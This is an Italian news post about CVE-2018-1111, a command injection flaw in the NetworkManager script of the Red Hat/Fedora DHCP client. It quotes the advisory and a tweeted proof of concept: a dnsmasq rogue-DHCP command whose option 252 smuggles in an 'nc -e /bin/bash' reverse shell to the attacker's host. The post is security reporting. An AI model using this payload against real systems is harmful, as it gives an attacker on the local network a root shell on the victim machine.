Falla nello script di integrazione del NetworkManager presente nel client DHCP di RHEL e Fedora

A pochi giorni dal rilascio di Fedora 28, un ricercatore di Google, Felix Wilhelm, ha scovato una falla critica che affligge il client DHCP presente su RedHat e derivate; in questo caso pare solo Fedora.

La falla è stata inserita come CVE-2018-1111 e nei dettagli spiegano:

A command injection flaw was found in the NetworkManager integration script included in the DHCP client packages in Red Hat Enterprise Linux. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.

Una falla che sfrutta il command injection è stata trovata nello script di integrazione con NetworkManager nei pacchetti del client DHCP di Red Hat Enterprise Linux. Un server DHCP malevolo o un malintenzionato presente sulla rete locale in grado di fare spoofing sulle risposte DHCP, potrebbe utilizzare questa falla per eseguire comandi arbitrari con privilegi di root sui sistemi che utilizzano NetworkManager e configurati in modo da impostare i parametri di rete tramite DHCP.

Wilhelm afferma che il codice per l’exploit è cosi piccino da riuscire a stare in un tweet! Say no more! Barkın Kılıç, un ricercatore turco ha pubblicato un tweetable Proof of Concept:

#CVE-2018-1111 tweetable PoC dnsmasq –interface=eth0 –bind-interfaces –except-interface=lo –dhcp-range=10.1.1.1,10.1.1.10,1h –conf-file=/dev/null –dhcp-option=6,10.1.1.1 –dhcp-option=3,10.1.1.1 –dhcp-option=”252,x’&nc -e /bin/bash 10.1.1.1 1337 #” cc: @cnbrkbolat pic.twitter.com/vUICm2HluC

— Barkın Kılıç (@Barknkilic) May 15, 2018